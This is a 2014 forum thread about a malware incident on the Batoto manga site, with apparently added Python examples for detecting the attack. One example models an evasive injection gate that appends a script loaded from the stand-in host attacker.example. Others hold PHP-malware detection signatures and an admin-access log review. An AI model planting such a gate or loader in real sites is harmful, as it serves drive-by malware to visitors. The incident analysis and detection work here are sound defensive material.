Malware warning by Google [Incident: 2014/08/21]


  • This topic is locked
62 replies to this topic

#1
Grumpy

    RawR

  • Administrators
  • 4,078 posts
  • Location: Here of course!


Well... don't panic... but it appears Batoto has been hacked.

Google's scanner reported that malware was present on this site about half a day before this post, which caused the malware warning to be displayed to anyone trying to visit the site; that is what started the investigation.

An encrypted JavaScript injection (simply put, malware / a virus) was found in Batoto's skin code, namely Deluxe. This is highly concerning, since the admins are supposed to be the only ones who can access that. I cleaned out the infection, but later decided to nuke the entire skin, as there may be more lingering pieces. The Deluxe skin has been deleted and will not be restored. In its place, our old skin, Sylo, is back as the default, and Blood is still there as an option.

At this time, I am unable to be certain of the scope of the damage or the point of vulnerability. I am going to investigate further later as to since when this virus has been present.

I'm not sure what the injected JavaScript does, because whenever I tried to access it, I either got an already-suspended account that it led to, or a file-not-found page (404). But it is possible the not-found page is a disguise, since it's possible to make the URL time-gated and/or referrer-gated to prevent accessing the same URL again later. At the same time, it's entirely possible the URL the virus tried to load really didn't exist and resulted in no action.

The virus itself seems to hide itself often, making detection difficult. On top of that, it seems very new (or recently altered) and does not exist in many anti-malware databases. That's why there were even notices by Google saying there's malware but finding 0 pages with it. Almost no scanner I tried detected it, and I almost gave up on using scanners. It seems to have targeted IE users: I could not make the injected code appear using Firefox/Chrome browser headers. It targeted users that came from a search engine. It was also invisible to the standard Googlebot.

During the investigation, I also found out that the same kind of virus was previously present at another IPB site, completely independent of ours. Similarly, it is running version 3.4.6 (the latest). So it seems most likely that this virus targets IPB sites and may be a zero-day exploit (an exploit that no patch exists for). I've sent what info I have (little, but as much as I can) to IPB as well, in case it really is a zero-day attack against IPB systems.

The biggest concern right now is that I still don't know exactly how the system was breached. If this really is an attack against the current version of IPB, I can't guarantee the virus won't return. If it was an exploit caused by the Deluxe skin, I have gotten rid of it, but that's just a guess. I've been scouring the logs for the last few hours... and besides the typical dozens of attempts that failed (this is nothing specific to us, just the life of a sysadmin), I really don't see anything special right now.

AS OF NOW

No unknown 3rd-party items are being pulled during loading of Batoto pages, so Google is no longer flagging us as suspicious.

If you see anything suspicious from this moment on, please report it immediately! If you don't have an account, you can email me: [email protected]

Security tips & Profiling

These kinds of malware (JavaScript injected into sites) are typically after putting up their ads / redirecting you somewhere else / installing a virus on your computer. From the reports I've gotten, it doesn't seem like that's happening. But just as a tip... if this site, heck, any site or anything, anywhere, EVER tells you to install something, don't. The only time you want to install something is if you initiated it, i.e. if you went out to search for and install that thing.

Also, if you'd like, Batoto is designed to be able to run without JS or Flash. You can run this site with pure HTML & CSS only, which has zero risk, but certain features will be inaccessible.

tl;dr

It looks like we're okay. But we might not be.

p.s. This incident is not related to the ads.


Edited by Grumpy, 22 August 2014 - 01:05 AM.
updated few things
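The behaviour described in the post (payload only for visitors arriving from a search engine, nothing for Googlebot or known scanner addresses) is conditional injection, and it explains why a single test request from the admin's own browser or from a scanner saw a clean page. The following is an added example, not code from the post or from the injected script itself: a small model of such a gate, followed by the check a site owner actually needs after a cleanup, which is to fetch the page under a matrix of client address, Referer and User-Agent rather than once. The excluded IP ranges, the referer list and the payload host `attacker.example` are constructed stand-ins; the real values are not known from the thread.

```python
import ipaddress
import re
from dataclasses import dataclass
from itertools import product

# Constructed exclusion list standing in for the "well-known scanner IP ranges" the post
# describes. RFC 5737 documentation ranges are used here; the real list is unknown.
SCANNER_RANGES = [ipaddress.ip_network(n) for n in ("192.0.2.0/24", "198.51.100.0/24")]

# Referer values the gate treats as "visitor arrived from a search engine".
SEARCH_REFERER = re.compile(r"^https?://([a-z0-9-]+\.)*(google|bing|yahoo|yandex)\.", re.I)

# Hypothetical host for the second-stage script; the real URL is not known from the thread.
PAYLOAD_HOST = "attacker.example"


@dataclass(frozen=True)
class Request:
    client_ip: str
    referer: str       # "" when the browser sent no Referer header
    user_agent: str


def gate_serves_payload(req: Request) -> bool:
    """Model of the server-side gate: True only when the injected <script> would be emitted."""
    ip = ipaddress.ip_address(req.client_ip)
    if any(ip in net for net in SCANNER_RANGES):
        return False                       # scanner / crawler address: serve the clean page
    if "googlebot" in req.user_agent.lower():
        return False                       # crawler UA: serve the clean page
    if not SEARCH_REFERER.search(req.referer):
        return False                       # bookmark, typed URL, reddit link: no payload
    return True


def render_page(req: Request) -> str:
    """Clean page, or the same page with the remote script appended when the gate allows it."""
    page = "<html><body><h1>Batoto</h1></body></html>"
    if gate_serves_payload(req):
        page = page.replace("</body>", f'<script src="https://{PAYLOAD_HOST}/x.js"></script></body>')
    return page


def probe_matrix(ips, referers, user_agents):
    """Render the page under every combination and list the ones that carried the payload.

    One request from one vantage point proves nothing when the injection is conditional;
    the matrix shows exactly which (address, referer, UA) triples still get the script.
    """
    return [
        (ip, ref, ua)
        for ip, ref, ua in product(ips, referers, user_agents)
        if PAYLOAD_HOST in render_page(Request(ip, ref, ua))
    ]


# Constructed probe set: one ordinary visitor address, one address inside the excluded ranges.
PROBE_IPS = ["203.0.113.5", "192.0.2.7"]
PROBE_REFERERS = ["", "https://www.reddit.com/r/manga/", "https://www.google.com/search?q=batoto"]
PROBE_UAS = [
    "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1)",
    "Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0",
    "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
]

if __name__ == "__main__":
    for hit in probe_matrix(PROBE_IPS, PROBE_REFERERS, PROBE_UAS):
        print("payload served to", hit)
```

Against a live site the same matrix is run with real HTTP requests (curl with `-A` and `-e`, from at least one residential or VPN address that is not a hosting range), and a page is only declared clean when every cell comes back without the foreign script.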


#2
Aoitenshi1

    Fingerling Potato

  • Donator
  • 50 posts
  • Location: Indonesia

And here I thought this was why you had removed the ads. ;)

 

EDIT: I see that they're back on now though.


Edited by AoiTenshi1, 21 August 2014 - 03:14 PM.

Featured Projects:

- Lady Ayane is a Sanova B**chi

- Raisekamika

 

Roses are red,

Lilies are awesome.

Won't you donate?

to aoitenshi.com

 

Buy Me a Coffee [link here]
Become a Patron! [link here]
Send some bitcoin (too expensive) satoshi? 1KjFCmpFiXDBLL6RwKJGkDhaQwe9JMx6nf


#3
ku4eto

    Potato Spud

  • Members
  • 32 posts
  • Location: Bulgaria, Sofia

JavaScript injection is not something much used... from my experience, largely PHP is injected, with redirections or eval(base64_decode crap. BTW, as these are system files which are not supposed to have been updated any time soon, you can run an SSH session to filter out any files that have been updated on that date. But you said that you were a sysadmin, so I suppose you have done that already....


"Together we fight.... for the blood of the nations!"
"Running through life with blindfolds..."
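The check suggested in the post (list files modified around the incident date, then look for the eval(base64_decode(...)) family) can be done from an SSH session with `find . -name '*.php' -newermt '2014-08-20'` piped into grep. Below is an added example of the same sweep in Python, not code from the post or from IPB: it walks a tree for .php files whose mtime falls inside the window and reports which obfuscation idiom each one matches. The signature list and the demo file tree are constructed for the example; the rule names are the author's own labels.

```python
import os
import re
import tempfile
import time
from datetime import datetime, timedelta
from pathlib import Path

# Constructed signature list: the eval(base64_decode(...)) family mentioned in the post, plus
# two other idioms injected PHP commonly uses. Tune it to your own codebase.
SUSPICIOUS = {
    "eval-of-decoded-blob":
        re.compile(rb"eval\s*\(\s*(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\("),
    "preg_replace-/e":          # the /e modifier evaluates the replacement as PHP
        re.compile(rb"preg_replace\s*\(\s*[\"'][^\"']*/e[\"']"),
    "exec-of-request-input":    # code execution fed straight from a request parameter
        re.compile(rb"\b(eval|assert|system|passthru|shell_exec)\s*\(\s*\$_(GET|POST|REQUEST|COOKIE)\b"),
}


def find_suspicious_php(root: Path, since: datetime):
    """List (relative path, rule name) for *.php files modified at or after `since` that match a rule.

    The mtime filter is only a first cut: an attacker can reset timestamps (touch -r), so when a
    clean copy of the same version exists, compare file hashes against it instead of trusting mtime.
    If the forum caches skin templates to disk, include that cache directory in the sweep.
    """
    cutoff = since.timestamp()
    findings = []
    for path in sorted(root.rglob("*.php")):
        if path.stat().st_mtime < cutoff:
            continue
        data = path.read_bytes()
        for name, pattern in SUSPICIOUS.items():
            if pattern.search(data):
                findings.append((path.relative_to(root).as_posix(), name))
                break
    return findings


def demo():
    """Constructed tree: one clean file, one freshly injected file, one injected file with an old mtime."""
    root = Path(tempfile.mkdtemp())
    (root / "index.php").write_text("<?php echo 'hello'; ?>")
    (root / "skin").mkdir()
    (root / "skin" / "deluxe.php").write_text(
        "<?php /* cached template */ eval(base64_decode('ZWNobyAnaGknOw==')); ?>")
    old = root / "old.php"
    old.write_text("<?php eval(gzinflate($x)); ?>")
    week_ago = time.time() - 7 * 86400
    os.utime(old, (week_ago, week_ago))          # outside the window, so not reported
    since = datetime.now() - timedelta(days=1)
    return find_suspicious_php(root, since)


if __name__ == "__main__":
    for rel, rule in demo():
        print(f"{rel}: {rule}")
```

The old file is deliberately left unreported to show the limit of the mtime filter: a second pass over the whole tree without the date cut-off, or a hash comparison against a pristine install, is what closes that gap.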


#4
notsostupidusername

    Potato Sprout

  • Members
  • 1 posts

Can't report anything out of the ordinary, so I guess at least I'm fine? I ignored the Chrome warning.



#5
Hakim El Ghazouani

    Potato Sprout

  • Members
  • 1 posts

Well, I experienced the warning with the Blood skin about an hour ago, but I just got back, and now I get no warning at all :)



#6
Divide Overflow

    Potato Sprout

  • Members
  • 7 posts

Makes me happy I uninstalled Java long ago.



#7
Halo

    Potato

  • Donator
  • 171 posts


... It seems to have targeted IE users.

So nobody was affected? Sweet.

#8
Fruit

    Fingerling Potato

  • Donator
  • 62 posts

Hopefully it won't return, eh. If it's a zero-day, gege.

You should redirect people who use IE to a page where it says something like "This website might not be safe on IE, use another browser or proceed with caution.".


So nobody was affected? Sweet.

More people use IE than you think.




#9
Mizura

    Couch Potato

  • Members
  • 4,851 posts

Huh! I was wondering what that was about! Thanks for fixing it so quickly. :)




Kubera stuff: Character charts , Races and Cities , The finite (official side novel) ,
Official English Webtoons: https://www.webtoons.com


#10
PkmSilver

    Potato Spud

  • Members
  • 22 posts
  • Location: Calgary, AB, Canada

I got a random Java update today, but then I couldn't cancel it. Is it something related to the Batoto malware?



#11
Aurega

    Fingerling Potato

  • Contributor
  • 64 posts
  • Location: VI-scans

NoScript FTW!

 

But good job Grumpy!


Edited by Aurega, 21 August 2014 - 04:32 PM.


#12
Ascheroth

    Potato Sprout

  • Members
  • 1 posts

I got a random Java update today, but then I couldn't cancel it. Is it something related to the Batoto malware?

Java has absolutely nothing to do with JavaScript, so no, it wasn't related.



#13
CatMtKing

    Potato Sprout

  • Members
  • 2 posts

Makes me happy I uninstalled Java long ago.

Java is not JavaScript (they are two very different computer languages). Every browser comes with a JavaScript interpreter, and unless something intercepts it, JS code will be executed when you visit the webpage.


Edited by CatMtKing, 21 August 2014 - 04:58 PM.


#14
truepurple

    Baked Potato

  • Members
  • 1,461 posts

I told Chrome to ignore the malware warning and visit Batoto before you fixed the issue; do I have to worry about having been infected?



#15
Baniita

    Potato Spud

  • Members
  • 26 posts

So nobody was affected? Sweet.

lmfao


More people use IE than you think.

None of whom have a clue what they're doing.



 

tumblr: The Yullenator / Baniita
`{01} [ 神アレ / Y U L L E N ] » dgm----------------
`{02} 🎧 [ ヨシュネク / J O S H N E K U ] » twewy-----
`{03} 💔 [ シズイザ / S H I Z A Y A ] » drrr!!----------


#16
Shrimpeh

    Fried Potato

  • Members
  • 552 posts
  • LocationCity of Legacia

Thx for the update, Grumpy.

Well... don't panic... but it appears Batoto has been hacked.

I bet everybody who read this went and at least did a quick scan of their computer.

You should redirect people who use IE to a page where it says something like "This website might not be safe on IE, use another browser or proceed with caution.".

I like this idea; it may make people use something else.

More people use IE than you think.

Everybody should know by now that they shouldn't use IE; we are in 2014, not 2000.
Newer versions may have been better, but it still sucks.


Edited by Alex Shrimpostur, 21 August 2014 - 05:36 PM.

 


my ideal girl: nice, shy, beautiful, loyal, outgoing, half-traditonal, half modern,  preferably black hair or red hair, has a sense of humor, a little nerd-ish / otaku-ish. 


#17
Grumpy

    RawR

  • Administrators
  • 4,078 posts
  • Location: Here of course!

Okay. I did a bit more reverse engineering.

The JavaScript code was injected from PHP.

It appears it does target all commonly used browsers. I'm not sure why my previous tests with Chrome/Firefox kept resulting in no data.

It also avoids certain sets of IP ranges, including Google's crawler. I'm guessing it's a list of well-known scanner IPs, so as to avoid detection by scans.

It only loads the JavaScript when you come from a search engine. So, if you visited via a bookmark, a typed address, or even a non-search-engine site like reddit, you wouldn't have been affected.

The code that I reverse engineered really showed no interest in anything other than hoarding IPs and ... (below)

Ultimately, the end goal (from what is put on our site) is to load their JavaScript hosted on their site. The contents of that are still a mystery to me, since the combos I tried get 404s. But it's quite clear to me now that it will actually lead to malware. According to Google's report, however, it does seem to lead to some sort of execution in the end (in which form is unspecified). Lots of it, too: it said 17 processes on average.

=================================

I've also talked to IPB. They (technically he; I talked to one person) think it's the result of an administrator account being breached with a remote script, the reason being that similar cases were seen back in 2012 and that was the source of the problem. But...

- I changed passwords twice since the last security announcement, and used them nowhere else.

- I know treb also has a unique, generated password used for this site only.

- mhh, I don't know the strength of his password, but I know he changed it now and during the last security announcement.

- The last admin account is actually one used by the IP.Board support guy long, long ago... (this account has been demoted now)

=================================

If the hole really is the breached admin account, which is solved by changing the password, AND all it did was put in a JS script, the damage seems fairly minimal for the amount of access that was gained. I suppose I should start firewalling the admin stuff...


Edited by Grumpy, 22 August 2014 - 01:16 AM.
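If IPB's theory of a breached administrator account is right, the web server's access log is where the evidence lives: requests to the admin panel from an address no admin uses, a scripted User-Agent, a POST to the login page answered with a redirect and then successful page loads from the same address. The following is an added example, not code from the post or from IPB, of that review over a few constructed "combined" format log lines; the `/admin/` prefix and the allowlisted admin range are assumptions that must be adjusted to the real install (the admin directory may have been renamed), and the paths and query strings in the sample lines are made up.

```python
import ipaddress
import re
from collections import defaultdict

# Apache/nginx "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Assumptions: the admin control panel is served under /admin/ (change if yours was renamed),
# and the admins connect from a known range. RFC 5737 documentation ranges are used here.
ADMIN_PREFIX = "/admin/"
ADMIN_ALLOWLIST = [ipaddress.ip_network("203.0.113.0/24")]


def parse_line(line: str):
    """Return the named fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def unexpected_admin_access(lines, allowlist=ADMIN_ALLOWLIST, prefix=ADMIN_PREFIX):
    """Group admin-panel requests from outside the allowlist by client IP.

    Returns {ip: [(timestamp, method, path, status, user_agent), ...]}. A 302 on a POST to the
    login page followed by 200s on other admin pages from the same IP is the shape of a
    successful login with a stolen or guessed password.
    """
    hits = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None or not rec["path"].startswith(prefix):
            continue
        ip = ipaddress.ip_address(rec["ip"])
        if any(ip in net for net in allowlist):
            continue
        hits[rec["ip"]].append((rec["ts"], rec["method"], rec["path"], rec["status"], rec["ua"]))
    return dict(hits)


# Constructed sample lines: a legitimate admin, a scripted login from elsewhere, and an
# ordinary visitor. Paths and query strings are made up for the example.
SAMPLE_LOG = """\
203.0.113.10 - - [21/Aug/2014:03:12:01 +0000] "GET /admin/index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0"
198.51.100.77 - - [21/Aug/2014:03:40:55 +0000] "POST /admin/index.php HTTP/1.1" 302 0 "-" "python-requests/2.3.0"
198.51.100.77 - - [21/Aug/2014:03:41:02 +0000] "GET /admin/index.php?app=core&module=skins HTTP/1.1" 200 9000 "-" "python-requests/2.3.0"
192.0.2.9 - - [21/Aug/2014:03:45:00 +0000] "GET /forums/ HTTP/1.1" 200 3000 "https://www.google.com/" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1)"
""".splitlines()


if __name__ == "__main__":
    for ip, reqs in unexpected_admin_access(SAMPLE_LOG).items():
        print(ip)
        for ts, method, path, status, ua in reqs:
            print(f"  {ts} {method} {path} -> {status} [{ua}]")
```

The same allowlist is what "firewalling the admin stuff" means in practice: once the admin panel is only reachable from those ranges (at the web server or firewall, not just by password), any line this script would flag becomes a 403 instead of a login.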


#18
truepurple

    Baked Potato

  • Members
  • 1,461 posts
It only loads the javascript when you come from a search engine. So, if you visited via bookmark, typed address, or even non-search engines like reddit, you wouldn't have seen it.

 

 

I got the message when visiting directly from chrome or firefox.

 

So do I have to worry about having been infected or not, Grumpy? (Because, like I said, I ignored the warning on Chrome to visit before you fixed the issue.) It seems from what you said, no, but I want to make sure.


Edited by truepurple, 21 August 2014 - 05:42 PM.


#19
rc1138

    Potato Spud

  • Donator
  • 46 posts

Wow, what a scary world we live in. The last time I felt so was when eBay was hacked. Even though they said that no personal data was stolen, I still get a lot of spam (not like I care about it).




#20
Halo

    Potato

  • Donator
  • 171 posts

I suppose I should start firewalling the admin stuff...

Yeah, probably.

MangaTraders.com
never forget